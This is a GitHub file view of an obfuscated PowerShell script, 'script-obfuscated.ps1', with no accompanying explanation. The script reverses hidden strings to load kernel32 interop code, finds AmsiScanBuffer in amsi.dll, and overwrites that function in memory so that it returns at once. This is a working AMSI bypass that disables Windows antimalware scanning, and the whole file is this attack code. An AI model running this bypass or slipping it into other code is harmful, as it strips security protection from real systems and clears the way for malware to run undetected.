-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathscript-obfuscated.ps1
27 lines (22 loc) · 1023 Bytes
/
script-obfuscated.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
$Apple = @"
}
;)tcetorPdlOlfpl tniu tuo ,tcetorPweNlf tniu ,eziSwd rtPtnIU ,sserddApl rtPtnI(tcetorPlautriV loob nretxe citats cilbup
])"23lenrek"(tropmIllD[
;)emaNcorp gnirts ,eludoMh rtPtnI(sserddAcorPteG rtPtnI nretxe citats cilbup
])"23lenrek"(tropmIllD[
;)eman gnirts(yrarbiLdaoL rtPtnI nretxe citats cilbup
])"23lenrek"(tropmIllD[
{ 23niW ssalc cilbup
;secivreSporetnI.emitnuR.metsyS gnisu
;metsyS gnisu
"@
$Apple = $Apple.ToCharArray();[array]::Reverse($Apple);$Apple = $Apple -join ""
Add-Type $Apple
$DllName = "lld.isma".ToCharArray();[array]::Reverse($DllName);$DllName = $DllName -join ""
$DllAddr = [Win32]::LoadLibrary($DllName)
$FuncName = "reffuBnacSismA".ToCharArray();[array]::Reverse($FuncName);$FuncName = $FuncName -join ""
$FuncAddr = [Win32]::GetProcAddress($DllAddr, $FuncName)
$p = 0
[Win32]::VirtualProtect($FuncAddr, [uint32]5, 0x40, [ref]$p)
$Banana = [Byte[]] (0x31, 0xC0, 0xC3)
[System.Runtime.InteropServices.Marshal]::Copy($Banana, 0, $FuncAddr, $Banana.Length)